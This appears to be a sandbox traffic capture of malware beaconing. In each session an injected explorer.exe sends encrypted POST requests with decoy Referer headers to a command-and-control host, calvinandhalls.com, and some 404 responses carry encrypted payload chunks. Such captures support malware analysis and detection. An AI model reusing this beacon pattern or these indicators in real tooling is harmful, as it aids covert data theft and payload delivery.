Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49743        23.145.40.162   443               1028  C:\Windows\explorer.exe

Timestamp                Bytes transferred  Direction  Data
2024-09-25 14:02:22 UTC  290                OUT        POST /search.php HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Content-Type: application/x-www-form-urlencoded
                                                       Accept: */*
                                                       Referer: https://yqvikokvyrwyspvc.net/
                                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                       Content-Length: 171
                                                       Host: calvinandhalls.com
2024-09-25 14:02:22 UTC  171                OUT        Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 5c ab 75 a7 89 a7 0f 09 f6 7a 62 85 51 88 96 35 72 d6 16 0f 28 b5 db e7 5a e1 c8 73 60 90 ee 33 e8 54 21 88 e6 75 7b 77 71 55 30 f8 6d 94 da 8c 39 ef ed 60 0a 10 90 78 28 e3 35 1b 83 98 e9 92 04 1e d2 0a f7 3a 83 33 20 b4 54 8f 56 67 25 36 00 f4 b7 74 fb 86 37 9c 2c 6e fc dd e4
                                                       Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lk4%<\uzbQ5r(Zs`3T!u{wqU0m9`x(5:3 TVg%6t7,n
2024-09-25 14:02:23 UTC  278                IN         HTTP/1.1 200 OK
                                                       Date: Wed, 25 Sep 2024 14:02:22 GMT
                                                       Server: Apache/2.4.52 (Ubuntu)
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: DENY
                                                       X-Content-Type-Options: nosniff
                                                       Content-Length: 0
                                                       Content-Type: text/html; charset=utf-8
                                                       Connection: close


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       4 | 192.168.2.5 | 49744 | 23.145.40.162 | 443 | 1028 | C:\Windows\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:23 UTC | 286 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://kersnljeyirt.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 350
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:23 UTC | 350 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 61 e8 34 9f ab da 5b 47 ce 25 78 f1 78 f5 8b 10 03 e5 05 52 2c 90 ce 9f 2a a7 f5 14 43 ed bf 32 82 28 47 bd d4 78 3c 4d 1a 49 4c 8f 15 de cb 94 13 c8 e8 44 2b 0d 9e 13 29 b7 58 5e 8c e8 a8 97 51 70 b2 77 a3 55 a8 12 3b c6 1d d0 77 50 30 66 43 ca d5 1b 8f 94 04 c1 4c 62 e2 fe 89 03 d6 85 59 86 b2 8b 96 5d 64 9d b6 da 1b 16 cc 00 33 f0 64 64 4b 89 4e 3c 46 a5 44 2b 00 8e 90 dc 7b 37 c3 ab 06 a7 55 82 c0 b3 6e 77 1f 36 a7 02 37 01 0c 1d f0 00 a4 91 65 2b 00 32 3e fe 81 31 5a 08 23 c2 e9 9f 58 8b a1 66 df 30 96 be c2 d3 05 8d 5d
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lh4%<a4[G%xxR,*C2(Gx<MILD+)X^QpwU;wP0fCLbY]d3ddKN<FD+{7Unw67e+2>1Z#Xf0]
                                                                       2024-09-25 14:02:23 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:23 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       5 | 192.168.2.5 | 49745 | 23.145.40.162 | 443 | 1028 | C:\Windows\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:24 UTC | 289 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://udbfyhiovnpjdsu.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 223
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:24 UTC | 223 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 2e a4 03 fb c4 c9 1e 0a b3 6b 22 b4 5f 85 90 2f 32 f7 19 2a 28 94 aa 9a 39 eb b6 5c 57 d6 94 7f 8a 47 27 8a 9b 0d 14 77 44 39 29 83 2a ca f3 80 5d e4 fa 59 1d 1d e0 09 4e cc 65 1d c2 ca f7 85 23 6c a2 14 eb 36 e1 1b 78 d8 0e d3 35 3a 6d 76 16 ef c5 15 a7 87 0e ca 02 25 8f f9 8a 32 c5 b8 43 f0 a6 95 b5 0c 66 c1 db 9c 7f 0d a2 41 49 9c 1a 4d 5b e6 3b 14 52 e7 12 1c 21 85 8c d4 05 40 bb c8 74 e3 40 99 cc ed 6a 3d 32 66 ce 6e 7d 6d 7c
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Li4%<.k"_/2*(9\WG'wD9)*]YNe#l6x5:mv%2CfAIM[;R!@t@j=2fn}m|
                                                                       2024-09-25 14:02:24 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:24 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       6 | 192.168.2.5 | 49746 | 23.145.40.162 | 443 | 1028 | C:\Windows\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:25 UTC | 288 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://gmhyvptkkbkcth.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 288
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:25 UTC | 288 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 61 ea 12 e1 d4 b1 4d 4d d2 2b 13 98 5f c9 c7 37 1e b4 2e 01 7f 83 ae ff 20 bf ba 63 67 e4 b2 49 f8 57 4d bb 93 68 1e 69 48 07 3f 8f 33 c3 eb 8b 51 db fd 36 19 5a 99 1e 52 a2 6f 40 e9 e0 a6 ab 07 02 91 0a b0 7d fd 61 7c bc 2c dd 6c 41 32 1b 05 fd dc 6b bc c9 05 89 0d 2b d5 bb b2 3d e1 ef 4e b5 ac e6 bc 53 31 88 cf c2 68 16 c5 7d 13 96 18 70 13 f5 27 02 22 a4 10 1b 4c fb ba 89 35 6a d3 cf 7d af 2a f8 da fb 6b 3d 1d 42 ee 64 35 68 5f 0c ec 25 bc af 11 0f 28 74 34 95 f0 74 44 4f 01 ad 98 db 44 e8 a1 0f 90 66 a4 fd b6 b6 5e 9d 5c
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Ln4%<aMM+_7. cgIWMhiH?3Q6ZRo@}a|,lA2k+=NS1h}p'"L5j}*k=Bd5h_%(t4tDODf^\
                                                                       2024-09-25 14:02:25 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:25 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       7 | 192.168.2.5 | 49747 | 23.145.40.162 | 443 | 1028 | C:\Windows\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:26 UTC | 286 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://kgiatertamgp.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 321
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:26 UTC | 321 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 3c a9 38 b3 98 ac 4f 28 b1 37 03 ff 3a 85 f0 1c 2b ee 30 27 6c ce fa 8d 7c ee a0 5c 7c f3 a2 42 ee 45 44 f7 c6 5b 21 72 49 5f 55 f1 3f b9 d0 ce 53 e8 e6 30 79 41 8d 04 4a ba 6b 5a c8 8d e0 a7 39 79 cc 6f fb 7f b5 72 5b 9e 3e 80 6a 7b 76 7b 1b f3 bc 0d 9f a3 7c c3 50 65 9a b3 c1 35 aa 88 47 af 8d 84 98 09 2b a7 b2 d0 7e 49 91 16 0b eb 60 49 19 ae 3e 26 7b fa 28 79 1e 8c 87 83 33 35 d9 d5 35 9c 4e ca ae e6 2a 00 1a 66 bb 1b 2c 57 32 2d a6 0d 98 a4 60 5b 28 2f 0f ca fc 26 58 44 5f dc ee c3 0e c9 ff 21 ee 3b be 94 f2 9d 6a b6 7b
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lo4%<<8O(7:+0'l|\|BED[!rI_U?S0yAJkZ9yor[>j{v{|Pe5G+~I`I>&{(y355N*f,W2-`[(/&XD_!;j{
                                                                       2024-09-25 14:02:26 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:26 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       8 | 192.168.2.5 | 49748 | 23.145.40.162 | 443 | 1028 | C:\Windows\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:27 UTC | 290 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://oclbjgwufaxiagdw.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 185
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:27 UTC | 185 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 76 ae 1a 9c a8 b9 14 52 a4 09 7c ee 61 c5 9b 30 29 ae 63 01 50 a0 a8 d4 24 c0 ef 68 19 d8 b5 2e ef 71 61 ef 8c 5a 31 51 63 31 2d 90 09 9c d4 de 51 d7 bf 4f 7f 40 ad 1c 4c a8 28 01 c3 95 f5 c3 0c 06 c5 07 b7 79 9e 33 36 b3 58 d6 25 56 2e 26 71 eb d8 41 82 d1 13 91 26 2f eb f3 a6 20 ed e1 09 9b be 8d af 05 55 a7 88 9d 25
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Ll4%<vR|a0)cP$h.qaZ1Qc1-QO@L(y36X%V.&qA&/ U%
                                                                       2024-09-25 14:02:27 UTC | 278 | IN | HTTP/1.1 200 OK
                                                                      Date: Wed, 25 Sep 2024 14:02:27 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 0
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       9 | 192.168.2.5 | 49749 | 23.145.40.162 | 443 | 1028 | C:\Windows\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:28 UTC | 285 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://itcikyawgmc.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 299
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:28 UTC | 299 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 27 b6 61 97 bd a1 4c 56 cb 2c 3f e5 63 d5 9b 17 0e fc 2a 58 31 9d d3 9c 6d dd b3 47 0d e6 ac 78 80 69 72 f4 e1 18 03 5b 43 10 0c fe 1a af 96 90 1c 80 fd 51 79 3c 96 02 03 c1 3d 00 90 91 e2 82 3a 3b be 7d a6 2c 9a 33 4c b1 2b a4 4e 6d 53 16 1b c3 e5 42 82 a5 32 f1 44 04 f4 a8 a0 37 cb 95 71 bb b0 97 94 5e 52 95 8a c1 70 3f d6 0b 2d ca 1a 43 5b b2 25 18 37 a0 47 18 31 94 ca c2 00 30 df c1 02 a6 5b e8 a4 a5 2e 61 2f 4b d7 5e 13 63 44 0d d5 08 9d ab 06 50 0f 24 51 90 86 5a 22 39 3f a6 e3 8c 3c e9 eb 0a f7 20 95 e2 f0 84 1f c1 6d
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[@Lm4%<'aLV,?c*X1mGxir[CQy<=:;},3L+NmSB2D7q^Rp?-C[%7G10[.a/K^cDP$QZ"9?< m
                                                                       2024-09-25 14:02:28 UTC | 294 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:02:28 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                       2024-09-25 14:02:28 UTC | 7898 | IN | Data Raw: 31 65 65 37 0d 0a 00 00 b5 50 0f 6d f7 61 d7 e7 49 78 ba 09 bf db 6e 5b 92 64 4f 0c f1 aa 5d 78 6e 1d 37 6e a3 bf 51 b7 61 50 c8 4c 75 ec 96 6c 61 47 6f 72 d9 5d 28 4a c9 17 cf ae b0 92 75 82 7c d6 cc 92 b4 cc 04 6e 80 d9 27 08 88 90 7c 25 38 3b 06 b0 d9 98 1f b3 ee 24 b2 8e 94 c4 c7 84 78 7f df ff 07 32 07 d4 23 b4 c2 cf a3 d9 18 29 4c b6 6d 7e 16 31 ba 88 9c 6f 27 9e 77 77 ec 42 27 39 f1 c8 b5 0f 2b 2c 37 f5 27 0c ee 96 8c 2c eb 7f 13 2a 58 0b a1 c6 4a a5 04 a5 ee 06 88 e3 1d 96 d0 4c d7 1a 1c 0b 6e 31 a2 fd 08 4f 89 d7 29 16 31 bd a7 21 aa 5c b5 b5 55 45 44 dc a1 75 85 c1 e8 06 3a f3 80 41 02 4f fe 76 f4 a8 10 4e 8c 77 26 ec 91 05 1d da 3e 11 60 70 e2 86 3d ef 6e dd fe db a9 55 d9 c9 b4 f3 ac ba 08 34 ee fb c7 34 41 b5 cd 3a 1d 0c d7 46 85 07 8f 3d 07
                                                                      Data Ascii: 1ee7PmaIxn[dO]xn7nQaPLulaGor](Ju|n'|%8;$x2#)Lm~1o'wwB'9+,7',*XJLn1O)1!\UEDu:AOvNw&>`p=nU44A:F=
                                                                       2024-09-25 14:02:28 UTC | 19 | IN | Data Raw: 1a 58 b1 16 d2 fd ef 1b ab d7 46 9e ab 19 24 1b 3c de a6
                                                                      Data Ascii: XF$<
                                                                       2024-09-25 14:02:28 UTC | 2 | IN | Data Raw: 0d 0a
                                                                      Data Ascii:
                                                                       2024-09-25 14:02:28 UTC | 8192 | IN | Data Raw: 32 30 30 30 0d 0a 4f b0 ac 7b 5b 94 2f 8e fb a5 49 75 0f 40 51 70 86 33 86 ea 54 c2 9c a9 b3 9c cf 10 ce 73 f3 0a 45 73 70 80 bd cf 7c c6 1c 25 20 f0 db 31 01 72 f0 5d 54 16 83 19 c9 78 43 66 d9 c7 7f 47 ca 0f f7 a2 70 1e 62 4f 97 d4 85 58 23 aa d0 91 09 29 ee 80 ff 8b 54 15 25 28 bd e0 44 37 f5 d2 98 eb 0f e0 d6 36 42 df 9d 30 3b 76 0a 49 8d d8 2a 5a 2c 48 85 64 39 6f df 29 ee ea 49 62 42 61 fc 57 6e 83 9a b6 22 77 a6 6b e0 cf c9 e4 7a 54 6a 49 6b 6f 35 b7 56 48 95 56 16 b2 96 49 9e ba 4c 2c 9b 9c 43 42 13 5b a3 ab 34 c0 82 5d a9 9e 70 45 78 63 d2 8a a7 06 b3 53 cc e2 23 f1 5f eb 82 a9 0c ba 27 c8 99 eb 5e 0c 15 68 6c d4 ae e1 12 2f 24 0c 48 6d a6 03 50 bc 8c c8 19 7b 50 c9 e8 5e 04 70 28 b9 77 49 81 50 c8 50 6b ae b4 0b 13 a5 ca 64 4c e6 f3 cd d4 f6 e4
                                                                      Data Ascii: 2000O{[/Iu@Qp3TsEsp|% 1r]TxCfGpbOX#)T%(D76B0;vI*Z,Hd9o)IbBaWn"wkzTjIko5VHVIL,CB[4]pExcS#_'^hl/$HmP{P^p(wIPPkdL
                                                                       2024-09-25 14:02:28 UTC | 6 | IN | Data Raw: 4e 13 8c ae b0 c5
                                                                      Data Ascii: N
                                                                       2024-09-25 14:02:28 UTC | 2 | IN | Data Raw: 0d 0a
                                                                      Data Ascii:
                                                                       2024-09-25 14:02:28 UTC | 8192 | IN | Data Raw: 32 30 30 30 0d 0a 35 b2 82 d9 81 f6 49 55 1c 8d 04 5f c4 c2 8a 45 ec 18 f5 d8 fd a3 a0 c4 ae 36 1a 9f e2 f9 78 50 95 22 b7 53 4f 27 b1 f4 18 0e 17 d3 04 0a 15 7b 21 da bb 61 41 09 53 89 63 26 06 92 dd b9 cb 36 d9 2b b1 d3 b5 7f 99 b4 fd 21 7f 68 a1 a3 9a c8 f2 df ce 50 b9 f6 65 4b 05 db dd 03 f4 43 65 c4 8c 61 3e 97 ba 4a 79 8f 0c fe ee 9a 91 1c 6c 77 25 cb 40 8c b3 ad 55 8f 66 a4 df a5 4c f4 c9 c1 69 5d 48 0b 4f 32 71 7a 52 6c c0 39 48 fa 96 d0 c8 ec f4 9c a0 0a 28 2c 0e 70 0f 5f 56 3f 57 12 a8 f7 ec d3 73 0d 42 60 a6 37 ca 65 e1 1c 43 c8 32 77 4f a8 25 84 73 8c 57 fe fd 9b 22 07 c9 76 65 b4 ed 87 11 52 c9 bd 4c b2 d4 66 9f da 30 3f 8d 93 5a f7 d7 f1 5d 31 3d a5 2c 47 87 4b 21 aa 61 84 35 f5 f7 9a 70 4c 4f fb 1e f9 e1 fe d1 ec c9 f9 01 71 1e 89 dd 8a 35
                                                                      Data Ascii: 20005IU_E6xP"SO'{!aASc&6+!hPeKCea>Jylw%@UfLi]HO2qzRl9H(,p_V?WsB`7eC2wO%sW"veRLf0?Z]1=,GK!a5pLOq5
                                                                       2024-09-25 14:02:28 UTC | 6 | IN | Data Raw: eb 47 a6 2d 95 51
                                                                      Data Ascii: G-Q
                                                                       2024-09-25 14:02:28 UTC | 2 | IN | Data Raw: 0d 0a
                                                                      Data Ascii:


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       10 | 192.168.2.5 | 49750 | 23.145.40.162 | 443 | 1028 | C:\Windows\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:29 UTC | 286 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://nphwxmrpgxfb.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 354
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:29 UTC | 354 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 41 4c 6d 34 01 83 b6 25 93 3c 3b ea 7d e4 d8 ec 12 4e e3 06 09 ef 72 fd e4 3e 60 bb 02 09 5a 81 ea d9 5d e7 c3 56 7c e4 ef 7d 87 2a 62 f5 93 72 29 21 4b 42 14 80 3b dc fe ba 15 96 a8 72 22 3c 81 19 34 b4 6a 6d c3 fe f2 8f 30 07 de 6f b8 67 fc 72 73 b6 1b c1 64 58 4c 67 73 b9 ab 79 9e 8b 3e c0 36 3d f5 bf b1 2c d5 b6 6a 8b 96 fd 96 1d 4a 94 ab 95 44 2d c7 6e 23 fd 70 70 4d 9f 31 26 32 cc 27 05 18 e3 8b e3 16 4b c0 c2 69 be 5c d9 d5 ab 3a 35 22 2e e7 4f 02 1e 0d 16 ef 34 ea bc 00 5c 2c 45 14 c3 ff 47 5d 25 16 a3 c5 c8 0d ca a3 04 ce 28 d6 fb af d3 7c a7 2d
                                                                      Data Ascii: rn3a(DrB|s(#%P g3iqH[ALm4%<;}Nr>`Z]V|}*br)!KB;r"<4jm0ogrsdXLgsy>6=,jJD-n#ppM1&2'Ki\:5".O4\,EG]%(|-
                                                                       2024-09-25 14:02:30 UTC | 287 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:02:29 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 409
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                       2024-09-25 14:02:30 UTC | 409 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered wh


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       11 | 192.168.2.5 | 49751 | 23.145.40.162 | 443 | 1684 | C:\Windows\SysWOW64\explorer.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       2024-09-25 14:02:36 UTC | 288 | OUT | POST /search.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: https://calvinandhalls.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 501
                                                                      Host: calvinandhalls.com
                                                                       2024-09-25 14:02:36 UTC | 501 | OUT | Data Raw: 72 19 84 be ff 0e 15 8c 6e 87 e1 1f 33 84 61 28 ad 80 b3 d0 17 07 44 86 72 01 c1 e3 ef d5 42 9b 7c 9b b7 f4 73 88 a2 80 f5 0a d0 85 a6 6e 6c f2 e8 91 75 49 50 20 67 33 fa a7 84 c7 89 05 40 0c 18 e8 5a dd 46 4c 6a 34 01 83 b7 25 93 3c 48 cf 15 91 a3 dd 2a 25 c6 00 16 9c 51 e5 e3 1b 09 bf 67 33 46 c9 e0 f3 49 fe fe 76 77 f7 96 5d 8f 33 2d 87 e5 6a 0e 47 6b 11 28 eb 19 bb 96 8a 06 8b e6 69 22 2e 90 41 39 b6 26 46 ed f7 99 a5 69 56 b5 62 da 54 94 20 7f ae 3f 85 54 4b 4c 0b 75 ad cd 7c a1 cb 1d d8 13 7f ec f1 87 3a c4 82 74 bf a9 ae b0 3c 40 b1 a9 83 68 08 b6 4f 33 ef 1c 56 37 92 48 30 54 cb 3a 16 27 d8 9a c1 22 28 9e f1 4d c6 4d f9 a5 fd 3d 62 78 55 c1 69 0d 6d 2e 12 ea 19 9d a6 13 37 17 43 39 f8 98 43 6d 54 28 bb c0 d2 3b e9 ff 6a f8 63 8a 9d d5 a4 7a b5 55
                                                                      Data Ascii: rn3a(DrB|snluIP g3@ZFLj4%<H*%Qg3FIvw]3-jGk(i".A9&FiVbT ?TKLu|:t<@hO3V7H0T:'"(MM=bxUim.7C9CmT(;jczU
                                                                       2024-09-25 14:02:36 UTC | 287 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 25 Sep 2024 14:02:36 GMT
                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      Content-Length: 409
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
